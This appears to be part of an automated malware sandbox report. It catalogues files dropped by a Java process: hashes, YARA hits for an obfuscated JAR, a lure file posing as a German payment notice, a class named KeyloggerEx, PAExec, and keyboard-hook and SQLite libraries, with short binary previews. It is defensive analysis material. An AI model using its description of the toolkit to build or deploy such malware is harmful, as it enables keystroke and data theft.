                                      Size (bytes):52
                                      Entropy (8bit):4.834679141051596
                                      Encrypted:false
                                      SSDEEP:3:oFj4I5vpm4USnxkLn:oJ5bnAn
                                      MD5:820A51136103187466669F3549214450
                                      SHA1:F1F6A6F179214713FC76DC87FE7689CDC7352AB2
                                      SHA-256:70469350DB6EF612513EEF2E2B1E3A4248BBA2160EEFBBE18744AE837B7A297A
                                      SHA-512:FEC2CFBD27F5506983CE5FA2EF2E1DF3C314751C28A682BE59DD51C8B0E0ED12E9163950675C23FB263DC9E3737E88DFB3F9D522AE5374C0EC2246AFDE1F92A2
                                      Malicious:false
                                      Preview:C:\Program Files (x86)\Java\jre-1.8..1743742918187..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):2796
                                      Entropy (8bit):7.74055941239173
                                      Encrypted:false
                                      SSDEEP:48:9DtpMQU//Lm3Bec4NffvnGo1XVN1+w3iEYil/8qzQEr8njBeju6OOPtrFk8kUi1T:tIE3enGo1XV//3miZ0XMnVrq8CAUUEbV
                                      MD5:A54F66492FD94668EF51A545D292F0B1
                                      SHA1:5CA2E82ACD0E62C3C97FD9B16A27DA7FF88B68BA
                                      SHA-256:BDC068FBF030308A87B3C9A7FEA487EF12B1DF34290D617CC4B103F1FD7E27C7
                                      SHA-512:4916264091C45CD95E408EBBC7B08812479A4E77FD3A3036D95351E36516F8465A62089F20869DE89F4B69F9B15F159D27BDB894B4C657C0CAECE4436C64D496
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar, Author: Joe Security
                                      Preview:PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.... ...]...k0..q.A.Z.....s....".|!w.#qn.+;.).!tLzy~p.9fg....Uht7...Q....P...r.R.BK(../PK..a..U]...`...PK...........Z................InstallerCode.class.WI`......=c..[...!2.A6..LX.....e....C.<.%F3.4.nH..t_.n.M..)-m.V.1..5m.....z.6q.7Z,..B-......~...ko.x..a...ME..T...`.UqeH.5E....1.,a`a"n....:..F..h.dx..hc..XLS....N0.W..:..D..3t."..RR....3.*..v..=1=f>.P.U....c.R,c....1K.T.Q.I.......F.>.rwOK.....c9V2,/p,.....N.L.A ......k.X.....4.9.A...Z..%.)........E.C..R..w.f..].)cX.sD=?9....p..A.H.-..t.....<;...V J...M.*.i..kdL...mG.>..F...J4`.+k.....S...x*=...#...>...P.5.....\.....,..S...h..4..v.......k.......5...XR...{..2$u...6./.Iitw......M.........\..s..........;.p..Q)b..C.E..v....eG.v..sI...C......f1.T..b..{.D..W...E.0,....TS.......XX-......4..0...K}.{Qs}8l.!.Q...+.^SD;..1t.*4......%.P.3....v.N...G...DxK&...)..;.x......F5~.*...O.a....o....n..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):11108
                                      Entropy (8bit):7.907426955263712
                                      Encrypted:false
                                      SSDEEP:192:7pawDRaWMYXGm263/+vsm1V9QObYWwevvJbmeU2uDYunhqBHr9t6rSVU1Ls5c5l8:7pawdaWXvWsm1EO8WPBmeUVk7Hrr6rSh
                                      MD5:D0A0C0C43784CB4C27038A4A3E23F2BA
                                      SHA1:525C51436633938E49AB44BA9F2BAD9CEAF54C13
                                      SHA-256:DB2C3F5A4745E129B2E4FB90766C4893C7D93423C16A3360797845B77561176F
                                      SHA-512:22A0678ED068A7E3B846EE32CDC9FE6403D2330AEAFF11F68C7BBEAD5A86FB27BBAD5F65E8956FC5E1EB1964AB180270E552F568C85A96053207B5A184589D98
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar, Author: Joe Security
                                      Preview:PK........ihsZ................META-INF/......PK..............PK........ihsZ................META-INF/MANIFEST.MFU.1..0.F.&...u..!$.Q.d.N......G....,..{..k1..b..It.j..L.F..=`?.Ae.kQ.fs..{2...i..1F8cz.....1..O.........P.;.#....Z..U...Z..f.}Orxk...PK....Z.........PK........ihsZ................k.class;.o.>.....NF..lv.FF....D...t}......v.f.d2#.....c...g....?#...f.#.Wp~iQr.[fN*........0.02.1..X... qV.PK..../f...l...PK........ihsZ................KeyloggerEx.class.Z.@[..>.!........t.6`...cd...F`c...#$,.c...n...L.4..&m.f.....iHW..u..{...M.......m....w...s....z..nR..2..3.PO...=m$f.:.;.+...=...N..Q#.0q7...@Ad(Xp".+.....C.......n..........t...k$..A,..]F.`../x*...W..!.^_..P#.\.P....0...S.......}8.K......\}.h9.Y].....h./.S....i...]C}.......{....k;.j.\...j..5-..Z,..2....~.E.@_.`O_@m..E%I.cZz..zT..[3{.[.i.p=...B...]......k..`....hAs.._.b0Ut...}.L).\..RiY:).k..Z.a.5Z+.BK.V.....B.h.x..dM..:....25.V(.B.P)..TB.,.CV...l.b+.xjOw...P.H;..f.ub.BU.F.....7...A....h(|.H
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):2662
                                      Entropy (8bit):7.74777446023506
                                      Encrypted:false
                                      SSDEEP:48:9XYe5NKxPuHiPLDgDK0DP7bLQbb+NSC0u4+jcefSHQ++P7qYZKppk6gc:r5kkuLyZn83fu44NZJP7jZKk6gc
                                      MD5:7FC5D32903CCFB588148C41481292EEA
                                      SHA1:098C980CB39F5DE6535D3E5339DEF97157DB8735
                                      SHA-256:DDFAFE23DB3BC32D6F53B255FDCE6A0A7815146D163D4C00A0F4A15EAFEF82FF
                                      SHA-512:43FA783F6A2783ECE97FF6337068C823DC0E75FDCD45988BE5C5656D72F5D3BF9FC95B79CE2D9AABCF8167F1EBED41A3559983B79F8B5827B41DFEF93CF69FFA
                                      Malicious:false
                                      Preview:PK.........~XZ................META-INF/......PK.........VeZy_..y...........META-INF/MANIFEST.MFE.... ..w.....4.I.umtr5..x..9n..[.t.~FL4.*p.\)'oZ..8..........4'.{.f.\2...fm#..g..7.n.9!t.....?R"...WZ.H...7./..VoPK.........TeZ...[Q...........DpApi.class.Wkx.e.....%..:..[vrtc.'2.-.tn4].uK...`.0.&_.lI......T.P<!.."......R......._.........6...ak.q.+y.....~...W^..`;..C....*\p..8...B.-...M.....{W:..v.8..G.x.\{.......Y.B.-.kR...G.b..K..y+m....;..k.G-3.K...z...X..V.~...W..PT+....>..WO.I..X.l.-%.R..&4+X.b..T.f.49i......:..a..+.b#>.H.^..f....F~vhz.|...ND..lF...h.f.oR.}4|L`5..[cK...v....;T..Z6..cp..\..vt(.Tq'B....Y...F.Fi.D.N8..(..t...Eh..-Xz. 1..LS.5m...g.[...c4u..h1...>... B..l....S.G..2.....lK.E..R.q.f.H.......L..z<..Nm..*.....j......>.Wp@......c.....L...S..1.*...............g4k.0....\wW.O...u......8....'.....x.!..0F.?F%..nn..#U....3..NP..@.0.q..*&q...V....3}vZ...xp.J$fL#.KfM...\../j....T..:....z2.{@..#....i..L..WO.tM..H3'cFB.L.7.TF....<R..M.v7.Z.E>..{..`:a.
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.275778370270322
                                      Encrypted:false
                                      SSDEEP:96:wjPrtU8Gd8XomS6rnI28Ij/STLHG1bowmb:wju8Gd8XomS6oI+XHGd
                                      MD5:1B44B5CD529382D3702BF106E2C94D10
                                      SHA1:6AA8BE28C7D09E731C3150473697A219A633067D
                                      SHA-256:397D951B3E851FDE2616F8A7DF6FEA2BD9E6396711507714B8515FA6243BD3BC
                                      SHA-512:AE11B3D253ADBD904BBCF9633D790580FC24352CA53DC43362F4007A3A086B2EABA2AF7634058F8D0C7A585769FEC95E31BDF0BC8FB0D2E317879C538AD47401
                                      Malicious:false
                                      Preview:........P9.......Q...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2802310005980957
                                      Encrypted:false
                                      SSDEEP:96:IpxrzX8GEZDYv655tq6rgTI28InaFSTgHG1bow75:IpJ8GgYva5tq6hIrEHGd
                                      MD5:E2AAEF9EA57694E080487A163ED3D944
                                      SHA1:DC64DB92B36ED0AE772E0C540B94CF30C1A47C2A
                                      SHA-256:E95CBCDF1248BFB7171E4BF4A4B8D9F249E12971DCDF95DEFBF2CCD5222ACF72
                                      SHA-512:995AE34A48F5255C97A1AAEC37F2AAA31CA6157402E81A55594EB66A760D995EE0793C9FF191EA18304A9AB15358E3173B218A57F100848AF8D0A42BECA14F23
                                      Malicious:false
                                      Preview:........h9.............. .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2795675974819485
                                      Encrypted:false
                                      SSDEEP:96:ajPrCGs8GrSgqy0xY6rII28IO/STePHG1bowGZy:aj28Ge7y0xY6hIJQHGd
                                      MD5:E9D97C416B7FB1CF248CA0612E06965E
                                      SHA1:605AFE3FA28E7E6555BC2659243820B661AF629D
                                      SHA-256:3C7F1B31E26C7E11CC321B6C5F9FEDA9E86E95C03FDA2C6063C359285F1E95A3
                                      SHA-512:E21FB30D692475ED785A7E8C7221801306A16FD4287D350D859AD80EBE92D2D38C853560E078774704E0F2AE96645DB3636C891AA9A96CE89C21B197A23654B1
                                      Malicious:false
                                      Preview:........`9......m~...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2962891498247433
                                      Encrypted:false
                                      SSDEEP:96:2Dor9c78GnqZQCOxtUkJdIoqu1oUl47TOaHG1bow+4cp:2DT8GnqZQC2nzITmoUGLHGdQ
                                      MD5:7A72874EE72073E2859F9BA44B12A38D
                                      SHA1:B3543928B3F0378B5CA68D263ECDF817479BF1F6
                                      SHA-256:37D304436B5C7F49763DD3D1F419E79CBAA7F1743A2D556EFAD80400DDD8931C
                                      SHA-512:D90AB8D5B1820906C907B2002D272949AD35D13F6161D81A221667728AE36EC6E2FDBF006F3F9A9BD23C0DACA216F4D50126F3B66C8F6445DF997C6E3D6D07EB
                                      Malicious:false
                                      Preview:........H9........(..... .......8...........J...0...sun.rt._sync_Inflations.....$.......8...........J...0...sun.rt._sync_Deflations.....".......@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..7.......@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..6.......8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):1506993
                                      Entropy (8bit):7.990710311197979
                                      Encrypted:true
                                      SSDEEP:24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6
                                      MD5:ACFB5B5FD9EE10BF69497792FD469F85
                                      SHA1:0E0845217C4907822403912AD6828D8E0B256208
                                      SHA-256:B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E
                                      SHA-512:E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA
                                      Malicious:false
                                      Preview:PK..........^O................META-INF/....PK..........^O...L............META-INF/MANIFEST.MF.._O.0...+.;............ahehE."...cgv.}.].i...i{..s.>>.....`.....J^....{sYX.....5......[h......-....q0.6.%.|.. ..c.i../..r.-.5.0..f+.7I.;.......".IV.=.D...H.A.J_..9......M..4...W9.....6.zZ...3g..tG....3....Q..._..N.`...p.y+.n.xw4*..z+C.Y`./Jc.o..WW..;B..=.....4..Lh.~..M..Q.~.6Jp......~m..p...Z.R.V..Oq..F.U....r.a.Yh...^].?.v.b/%.=e?.kt....e..Nw..n.{.......E..].P!.h.N....N."/..._<.&..{.C!.$......O..L....,+..S..Y..9{.gX- ..R....S"...xTGm..0........*.]J.M.dT.......9.b.(....\......,'...>..].i.q/..J<.Hy..k.9H.E.J.....!.Q!....*.8...j..^.7Y..Sv..r+8..Y..4..7V........&-th..v(rZ....F.~..G.~..r.:..sj....0.-.,.....k.H[.^T.}.....UTH.)g.0..,l.6|...fr..\...t~Usz......J,....6&l}.m....M...9.cPKT1.;....h^....u.{... C...^...2%yuD.2...Z9...t.~....PK..........^O................com/PK..........^O................com/sun/PK..........^O................com/sun/jna/PK..........^O..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):2681931
                                      Entropy (8bit):5.90068240083877
                                      Encrypted:false
                                      SSDEEP:24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8
                                      MD5:2F4A99C2758E72EE2B59A73586A2322F
                                      SHA1:AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF
                                      SHA-256:24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5
                                      SHA-512:B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494
                                      Malicious:false
                                      Preview:PK..........^O................META-INF/....PK..........^O.p..E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_201-b09 (Oracle Corporation)..Implementation-Title: com.sun.jna.platform..Implementation-Vendor: JNA Development Team..Implementation-Version: 5.5.0 (b0)..Specification-Title: Java Native Access (JNA)..Specification-Vendor: JNA Development Team..Specification-Version: 5..Automatic-Module-Name: com.sun.jna.platform..Bundle-Category: jni..Bundle-ManifestVersion: 2..Bundle-Name: jna-platform..Bundle-Description: JNA Platform Library..Bundle-SymbolicName: com.sun.jna.platform..Bundle-Version: 5.5.0..Bundle-RequiredExecutionEnvironment: J2SE-1.4..Bundle-Vendor: JNA Development Team..Require-Bundle: com.sun.jna;bundle-version="5.5.0"..Export-Package: com.sun.jna.platform;version=5.5.0, com.sun.jna.platf.. orm.dnd;version=5.5.0, com.sun.jna.platform.linux;version=5.5.0, com... sun.jna.platform.mac;version=5.5.0, com.sun.jna.plat
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):238200
                                      Entropy (8bit):6.633830240784974
                                      Encrypted:false
                                      SSDEEP:6144:2ypwv+96lffpB7TrNvEMAR8sKq9dMJE6K0p+aA5J3VUfXw:XlU5RBvrNMM8RbD7T6w
                                      MD5:75A586728AA168951B1C48F28F34C553
                                      SHA1:4E150E7CBFFA43FB120876221343AF15B3332049
                                      SHA-256:9C2A20B67EDE0CC57EB3E3708EAD52D98AD6065D5A539319D771846ACFAC6A75
                                      SHA-512:586AFF19E18C0B30C9E3AA859C3DC028C2472625E98EF7C46E023118CE518CEA149F4A8FE45DC3D43ABA2E2E8A9FAEB9EF34C25FA5B745E5FA294BBCDDE04851
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: tool_paexec_strings, Description: Detects PAExec based on strings, Source: C:\Users\user\AppData\Local\Temp\lib\paexec.exe, Author: Sekoia.io
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ct.h'..;'..;'..;lm.:-..;lm.:...;lm.:3..;7..:1..;7..:3..;7..:...;lm.:4..;'..;...;o..:-..;o.c;&..;'..;&..;o..:&..;Rich'..;........................PE..L...:\.g...............).....*...............@....@..................................N....@.................................D........0..(&...........P..xR...`..........p........................... ...@............@...............................text....-.......................... ..`.rdata.......@.......2..............@..@.data...|...........................@....rsrc...(&...0...(..................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                      Category:dropped
                                      Size (bytes):4322173
                                      Entropy (8bit):7.994785882289737
                                      Encrypted:true
                                      SSDEEP:98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa
                                      MD5:B33387E15AB150A7BF560ABDC73C3BEC
                                      SHA1:66B8075784131F578EF893FD7674273F709B9A4C
                                      SHA-256:2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491
                                      SHA-512:25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279
                                      Malicious:false
                                      Preview:PK........8f>I................META-INF/PK........7f>IzVC.....s.......META-INF/MANIFEST.MF..Oo.0.....,.k..-%..P.m..U...L2..&fm....@ .E.=o~o........7H.D.".8.5..mA.....L.c..F......!.lh..4.[H.0K...![.....Tq..1...G..@.?..\...P.."ao..S.:w.}.}.t.EW...b.6..(.5a....p.8[H*..p.bH..h..&l.w....D.e.We.<..h.=.....zx.:.W.ft.......a.....$......{..{..K..0.ZfP7.N>q......FH..4.....B.....:.q4.../..^f....;....m....V.....b..u..v0.k.S.9 .....<G...@..Bl87s.....p.K.;..5.x1.i]...:.l8_./.~.-.7....g[O...U;.$(..r..../.m.E2...=....CT..6K.9....=v=.s}..OPK........We>I................META-INF/maven/PK........We>I................META-INF/maven/org.xerial/PK........We>I............&...META-INF/maven/org.xerial/sqlite-jdbc/PK........We>I................META-INF/services/PK........QT>I................org/PK........8f>I................org/sqlite/PK........8f>I................org/sqlite/core/PK........8f>I................org/sqlite/date/PK........8f>I................org/sqlite/javax/PK........8f>I..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                      Category:dropped
                                      Size (bytes):791222
                                      Entropy (8bit):7.998588520286719
                                      Encrypted:true
                                      SSDEEP:24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t
                                      MD5:E1AA38A1E78A76A6DE73EFAE136CDB3A
                                      SHA1:C463DA71871F780B2E2E5DBA115D43953B537DAF
                                      SHA-256:2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609
                                      SHA-512:FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D
                                      Malicious:false
                                      Preview:PK.........x.N................META-INF/PK.........x.N................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R....L..y..J3sJ....&.f.f...]..l.-.z.zF.\.\.PK..PSF.m.......PK........lx.N................lc/PK........lx.N................lc/kra/PK........mx.N................lc/kra/system/PK........mx.N................lc/kra/system/keyboard/PK........mx.N................lc/kra/system/keyboard/event/PK.........x.N................lc/kra/system/lib/PK........mx.N................lc/kra/system/mouse/PK........mx.N................lc/kra/system/mouse/event/PK........mx.N............"...lc/kra/system/GlobalHookMode.class.R]o.A.=...,_[.R...Z....O....6Y..m1..W.v.M.h.4.F..?.xg%.b..pO..s.;3.~......0Dl(."'!%!. .M..d..*nq.S.I..24...;..Z.z..0,.N.p.3..O...-.t.......{......Uu..M.-5.7..i.`Xy7.3ta:C.....%....q.v..a.e.N.C;..r...........n.`.z..)...j..6.....XSt..k.....=..[.;.5.{.....q...GJB...J..7.L...a.2.........6w.0M..j*..C.T.Qb..RT..3..XQ.GBE.....
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1252711
                                      Entropy (8bit):5.880198419513214
                                      Encrypted:false
                                      SSDEEP:24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp
                                      MD5:D87EC90703E5CA1D19D16A2B571A01D4
                                      SHA1:0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC
                                      SHA-256:76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF
                                      SHA-512:DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]...........!.....(...T...............@.....d.........................P.......8........ .................................0...........................................................,R......................D................................text....&.......(..................`.P`.data...8....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......8..............@.0@.bss....(....p........................`..edata...............D..............@.0@.idata..0............J..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc...............V..............@.0B/14..................Z..............@..B/29......[.......\...^..............@..B/41..........@......................@..B/55.....:*...`...,..................@..B/67.....!...........................@..B/78.....................
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1252711
                                      Entropy (8bit):5.880198419513214
                                      Encrypted:false
                                      SSDEEP:24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp
                                      MD5:D87EC90703E5CA1D19D16A2B571A01D4
                                      SHA1:0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC
                                      SHA-256:76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF
                                      SHA-512:DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]...........!.....(...T...............@.....d.........................P.......8........ .................................0...........................................................,R......................D................................text....&.......(..................`.P`.data...8....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......8..............@.0@.bss....(....p........................`..edata...............D..............@.0@.idata..0............J..............@.0..CRT....,............R..............@.0..tls.................T..............@.0..reloc...............V..............@.0B/14..................Z..............@..B/29......[.......\...^..............@..B/41..........@......................@..B/55.....:*...`...,..................@..B/67.....!...........................@..B/78.....................
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):12898
                                      Entropy (8bit):7.93277955179482
                                      Encrypted:false
                                      SSDEEP:192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv
                                      MD5:5B6CEE019A5BCD56303094BB15787AAC
                                      SHA1:DFE538F5DCD7910B86F50EADD502810D2A6BDDAB
                                      SHA-256:A2AF2C47293272C35DDF0A3187F190E1235E7413CF076C8A8B651EE9162DFEBD
                                      SHA-512:E729A6BB2A19FD4E18CF6AC4C5444452552594072EFB943283EA1F75A095D8F3304C466697A712D7DE9A7C8AFA387C2C07CB2824D4F0BA1FBA96FC003253C00E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar, Author: Joe Security
                                      Preview:PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u...X....[.*h..%&.*8.....%...k.r.&f..:.$..[)8G.x{....r.r..PK.....rZ...[...PK...........Z................G.class.TMS.G.}#.V... ...&..I ..........F ..v......YV1.!.T~@N>.T..k.AJ..v.*.\...W..Z.2..;.3=o^..?..... ..........C...C..M)....F......E]VB.^....../.k....".......7o........D'&..gb.f.dj..|za1...]......,.Q2f....xx!5...L...GeU..0..b..3.x.p....|..9.ojE..6}.`.Os.1.6..|..-ps..\h.X.].....O.w.@.W..U..c..`...1.>A..=....#....|....>'..gh=.[...O.5E.p..>.S.X}.L..x!'..t.|*.P+_e.R..M.n..C.^...JZT.!.{}..[.a..4?s.^..(C.q....K..;<..'.q.....I..\=Q.F.sS&...A.cL....-...A.....4..>.....p.O.V..z...)W.d.Y(...D..)...........N.x.....E.JX...$U...I.\P.d.X2..Hj^.0..6.b..u...T.......I..,..,....Jv...T..r...p.!DC...5M|.s..F].a..LM..-.;....Q).o...ih...,n.I...E.Z.C2.&s.lL.b.IB.6}g.P.r..H.*........"....ct..'......D.t.....h.{.}..CB....9B.....
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):45
                                      Entropy (8bit):0.9111711733157262
                                      Encrypted:false
                                      SSDEEP:3:/lwlt7n:WNn
                                      MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                      SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                      SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                      SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                      Malicious:false
                                      Preview:........................................J2SE.
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):8870
                                      Entropy (8bit):6.015040608113816
                                      Encrypted:false
